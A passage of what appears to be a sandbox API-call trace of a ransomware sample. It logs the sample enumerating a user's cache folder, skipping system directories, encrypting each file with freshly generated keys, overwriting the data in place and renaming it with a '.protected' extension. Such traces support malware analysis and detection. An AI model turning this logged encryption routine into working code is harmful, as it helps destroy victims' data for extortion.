pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.982] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".protected") returned 0x0 [0088.982] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="RESTORE_FILES.txt") returned -1 [0088.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.983] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".txt") returned 0x0 [0088.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.984] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".rar") returned 0x0 [0088.984] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned 152 [0088.984] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpSrch=".zip") returned 0x0 [0088.984] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.985] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.985] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.985] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.985] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.985] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.985] CloseHandle (hObject=0x150) returned 1 [0088.985] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected") returned 162 [0088.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.protected")) returned 1 [0088.986] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | 
out: lpFindFileData=0x295e7d0) returned 1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Windows") returned -1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files") returned -1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="Program Files (x86)") returned -1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="$Recycle.bin") returned 1 [0088.986] lstrcmpiW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="System Volume Information") returned -1 [0088.986] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.986] StrStrIW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".protected") returned 0x0 [0088.986] lstrcmpW (lpString1="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpString2="RESTORE_FILES.txt") returned -1 [0088.986] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.986] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.987] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".txt") returned 0x0 [0088.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.987] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".rar") returned 0x0 [0088.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned 152 [0088.987] StrStrW (lpFirst="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpSrch=".zip") returned 0x0 [0088.987] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.988] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.988] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.988] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.988] WriteFile (in: hFile=0x150, 
lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.989] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.989] CloseHandle (hObject=0x150) returned 1 [0088.989] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected") returned 162 [0088.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.protected")) returned 1 [0088.990] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Windows") returned -1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files") returned -1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="Program Files (x86)") returned -1 [0088.990] lstrcmpiW 
(lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="$Recycle.bin") returned 1 [0088.990] lstrcmpiW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="System Volume Information") returned -1 [0088.990] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrIW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".protected") returned 0x0 [0088.990] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="RESTORE_FILES.txt") returned -1 [0088.990] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.990] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".txt") returned 0x0 [0088.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".rar") returned 0x0 [0088.990] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 119 [0088.990] StrStrW (lpFirst="696F3DE637E6DE85B458996D49D759AD", lpSrch=".zip") returned 0x0 [0088.990] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xf4, lpOverlapped=0x0) returned 1 [0088.991] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.991] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xf4, lpOverlapped=0x0) returned 1 [0088.991] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.991] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.991] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.992] CloseHandle (hObject=0x150) returned 1 [0088.992] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.protected") returned 129 [0088.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.protected")) returned 1 [0088.992] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.992] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Windows") returned -1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files") returned -1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="Program Files (x86)") returned -1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="$Recycle.bin") returned 1 [0088.993] lstrcmpiW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="System Volume Information") returned -1 [0088.993] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrIW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".protected") returned 0x0 [0088.993] lstrcmpW (lpString1="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpString2="RESTORE_FILES.txt") returned -1 [0088.993] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.993] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".txt") returned 0x0 [0088.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".rar") returned 0x0 [0088.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned 152 [0088.993] StrStrW (lpFirst="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", lpSrch=".zip") returned 0x0 [0088.993] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.994] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.994] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0088.995] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.995] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.995] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.995] CloseHandle (hObject=0x150) returned 1 [0088.995] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected") returned 162 [0088.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.protected")) 
returned 1 [0088.996] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Windows") returned -1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files") returned -1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="Program Files (x86)") returned -1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="$Recycle.bin") returned 1 [0088.996] lstrcmpiW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="System Volume Information") returned -1 [0088.996] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0088.996] StrStrIW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".protected") returned 0x0 [0088.996] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="RESTORE_FILES.txt") returned -1 [0088.996] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.996] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0089.006] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".txt") returned 0x0 [0089.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0089.006] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".rar") returned 0x0 [0089.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 119 [0089.006] StrStrW (lpFirst="7396C420A8E1BC1DA97F1AF0D10BAD21", lpSrch=".zip") returned 0x0 [0089.007] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: 